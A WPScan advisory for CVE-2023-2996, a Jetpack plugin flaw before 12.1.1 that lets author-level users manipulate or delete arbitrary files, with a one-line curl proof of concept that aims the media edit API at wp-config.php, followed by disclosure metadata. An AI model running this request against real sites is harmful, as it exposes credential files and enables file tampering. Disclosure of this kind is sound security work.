Jetpack < 12.1.1 – Author+ Arbitrary File Manipulation via API | CVE 2023-2996 | Plugin Vulnerabilities

Description

The plugin does not validate uploaded files, allowing users with author roles or above to manipulate existing files on the site, deleting arbitrary files, and in rare cases achieve Remote Code Execution via phar deserialization.

Proof of Concept

curl --json '{ "media": {"tmp_name": "/WP_CONTENT_PATH/wp-config.php", "name": "test.txt"} }' https://public-api.wordpress.com/rest/v1.2/sites/BLOG_ID/media/1/edit

Where BLOG_ID is the site Jetpack blog id.

Affects Plugins

Fixed in 12.1.1

References

CVE

URL

https://jetpack.com/blog/jetpack-12-1-1-critical-security-update/

Miscellaneous

Original Researcher

Miguel Neto

Submitter

WPScan

Submitter website

https://wpscan.com

Verified

Yes

WPVDB ID

52d221bd-ae42-435d-a90a-60a5ae530663

Timeline

Publicly Published

2023-05-30 (about 2 years ago)

Added

2023-05-30 (about 2 years ago)

Last Updated

2023-05-30 (about 2 years ago)

Other

Published

Title

Published

2021-08-19

Title

WP Cerber Security < 8.9.3 - Rest-API Protection Bypass

Published

2019-10-31

Title

Currency Switcher for Woocommerce < 2.11.2 - Security Restrictions Bypass

Published

2021-11-30

Title

LiteSpeed Cache < 4.4.4 - IP Check Bypass to Unauthenticated Stored XSS

Published

2015-07-18

Title

WordPress Mobile Pack <= 2.1.2 - Information Disclosure

Published

2020-05-07

Title

Ultimate Addons for Elementor < 1.24.2 - Registration Bypass